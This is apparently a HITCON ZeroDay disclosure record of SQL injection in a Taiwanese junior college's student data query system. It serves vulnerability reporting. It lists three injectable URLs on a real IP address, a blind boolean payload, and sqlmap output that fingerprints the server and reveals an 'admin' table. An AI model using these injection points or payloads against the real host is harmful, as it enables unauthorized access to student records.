Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00407
- Vendor: TACERT台灣學術網路危機處理中心
- Title: 耕莘健康管理專科學校某站SQL
- Introduction: 耕莘健康管理專科學校學生資料查詢系統多处SQL
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/04/06 23:53:17 : 新提交 (由 Cra5h 更新此狀態)
- 2018/04/07 00:27:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:10:36 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:10:37 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/06/06 03:00:23 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00407
- 通報者:cra5h (Cra5h)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
http://163.21.98.244/CALENDAR/AdmissionsNew/AN_board/view.asp?ID=11238
http://163.21.98.244/CALENDAR/AdmissionsNew/AN_board/view.asp?ID=11246
敘述
耕莘健康管理專科學校學生資料查詢系統多处SQL
SQL位置:(第一处)
http://163.21.98.244/CALENDAR/AdmissionsNew/AN_board/view.asp?ID=11242
sqlmap resumed the following injection point(s) from stored session:
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=11242 AND 7492=7492
[22:52:59] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[22:52:59] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\163.21.98.244'
确认影响库:(1库)
Database: Microsoft_Access_masterdb
[1 table]
+-------+
| admin |
+-------+
[22:55:01] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[22:55:01] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\163.21.98.244'
第二处:
http://163.21.98.244/CALENDAR/AdmissionsNew/AN_board/view.asp?ID=11238
第三处:
http://163.21.98.244/CALENDAR/AdmissionsNew/AN_board/view.asp?ID=11246
修補建議
过滤,参数化